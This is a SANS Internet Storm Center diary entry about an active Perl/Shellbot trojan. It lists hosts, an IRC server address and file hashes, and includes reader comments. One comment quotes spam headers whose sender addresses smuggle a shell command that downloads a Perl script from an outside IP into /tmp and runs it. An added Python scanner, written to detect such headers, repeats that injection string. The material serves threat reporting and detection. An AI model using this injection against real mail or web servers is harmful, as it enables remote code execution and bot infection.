SANS Internet Storm Center (ISC) diary: Active Perl/Shellbot Trojan

ISC received a submission from Zach of a Perl/Shellbot.B trojan served from fallencrafts[.]info/download/himad.png [1]. The trojan has limited detection on VirusTotal [2]. The script contains a "hostauth" of sosick[.]net [3], and the IRC server the compromised systems connect to is located at 89.248.172.144. From what we have so far, it appears to be exploiting older versions of Plesk.

md5: bca0b2a88338427ba2e8729e710122cd  himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9  himad.png

[1] https://dns.robtex.com/fallencrafts.info.html#graph
[2] https://www.virustotal.com/en/url/79654fc688b48211ccc24a14d815c41dba0b1dfbefc2c51d38ed88b481242e9b/analysis/1382747124/
[3] https://dns.robtex.com/sosick.net.html#records

-----------

Guy Bruneau, IPSS Inc., ISC Handler (gbruneau at isc dot sans dot edu)
I received an interesting attempt to infect my mail server with the Shellbot Trojan. The command to download and execute the trojan is sent as the subject line and as the reply-to.

I have no idea how that command is supposed to be executed; at least my Postfix didn't execute it. Since the mail is sent to postmaster@localhost (I received the mail because it was identified as spam and redirected), the intended target is not the mail client.

Attached is the mail, including headers (two header lines containing only local information removed):

Return-path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com>
Received: from localhost (localhost [127.0.0.1])
by mail.######.de (Postfix) with ESMTP id 6E6AB482E1
for <check-muell@######.intern>; Mon, 4 Nov 2013 16:58:12 +0100 (CET)
X-Envelope-To: <postmaster@localhost>
X-Envelope-To-Blocked: <postmaster@localhost>
X-Quarantine-ID: <xxtP22xJWX7m>
X-Amavis-Alert: BAD HEADER SECTION Missing required header field: "Date"
X-Spam-Flag: YES
X-Spam-Score: 5.47
X-Spam-Level: *****
X-Spam-Status: Yes, score=5.47 tag=2 tag2=5 kill=5 tests=[BAYES_40=-0.001,
MISSING_DATE=1.36, MISSING_HEADERS=1.021, MISSING_MID=0.497,
MISSING_SUBJECT=1.799, RDNS_NONE=0.793, TO_NO_BRKTS_NORDNS=0.001]
autolearn=no
Received: from mail.######.de ([127.0.0.1])
by localhost (mail.######.de [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id xxtP22xJWX7m for <postmaster@localhost>;
Mon, 4 Nov 2013 16:58:07 +0100 (CET)
Received: from domain.local (unknown [1.234.45.84])
by mail.######.de (Postfix) with ESMTP id 185F9482CB
for <postmaster@localhost>; Mon, 4 Nov 2013 16:58:06 +0100 (CET)
Message-Id: <20131104155812.6E6AB482E1@mail.######.de>
Date: Mon, 4 Nov 2013 16:58:12 +0100 (CET)
From: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com

x (Anonymous)
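The addresses in the headers above carry shell command substitutions (backticks) with ${IFS} standing in for spaces, since a literal space would break the address syntax the sender expects the target to parse. The following is an added example, not code from the post or from ISC: a small header scanner that flags envelope and From/Reply-To/Subject values containing command-substitution markers and reconstructs the intended commands by expanding ${IFS}. The sample header block is constructed from the injected address shown in the comment; the marker list and header names checked are assumptions for illustration.

```python
import re

# Constructed sample: the address is the one posted in the comment above,
# the surrounding headers are trimmed to what the scanner needs.
SAMPLE_HEADERS = """\
Return-path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com>
Received: from localhost (localhost [127.0.0.1])
From: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com
Subject: hello
"""

# Markers that only make sense if the value is meant to reach a shell:
# backtick substitution, $( ) substitution, and the ${IFS} / $IFS space trick.
SHELL_MARKERS = re.compile(r"`|\$\(|\$\{?IFS\}?")

# Headers an MTA, filter or webmail front end is likely to hand to a shell
# (assumption for this example; extend for your own pipeline).
HEADERS_OF_INTEREST = ("return-path", "from", "reply-to", "sender", "subject")


def parse_headers(raw):
    """Return a list of (name, value) pairs for a header block.
    Folded continuation lines (leading whitespace) are joined to the
    previous header; parsing stops at the first blank line."""
    headers = []
    for line in raw.splitlines():
        if not line.strip():
            break
        if line[0] in " \t" and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        else:
            name, _, value = line.partition(":")
            headers.append((name.strip().lower(), value.strip()))
    return headers


def extract_commands(value):
    """Pull each backtick-quoted command out of a header value and
    de-obfuscate it by turning ${IFS} / $IFS back into spaces, which is
    what a shell would do on expansion."""
    commands = []
    for cmd in re.findall(r"`([^`]*)`", value):
        cmd = re.sub(r"\$\{IFS\}|\$IFS", " ", cmd)
        commands.append(cmd.strip())
    return commands


def scan_headers(raw):
    """Return one finding per suspicious header: the header name, its raw
    value and the reconstructed commands an interpreting shell would run."""
    findings = []
    for name, value in parse_headers(raw):
        if name in HEADERS_OF_INTEREST and SHELL_MARKERS.search(value):
            findings.append({
                "header": name,
                "value": value,
                "commands": extract_commands(value),
            })
    return findings


if __name__ == "__main__":
    for finding in scan_headers(SAMPLE_HEADERS):
        print(f"{finding['header']}: {finding['value']}")
        for cmd in finding["commands"]:
            print(f"    would run: {cmd}")
```

Run against the sample, the scanner reports the Return-path and From headers and reconstructs the two stages the attacker intended: a wget of user.pl into /tmp/p.pl, followed by perl /tmp/p.pl. Backticks are legal inside a quoted local part, so treat a hit as a triage signal rather than a verdict, and log the expanded command alongside the raw header so the download host can be blocked.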
The way this is happening is through the Plesk vulnerability in the above article. It may affect more than just Plesk-related systems, but all systems using Horde. They can execute it via the login screen. Take a look at this: http://kb.parallels.com/en/113374. I've dealt a lot with these; if you need more assistance with this particular issue, you can always email me directly at kestrel@trylinux.us or zwikholm@cari.net.

Zach W
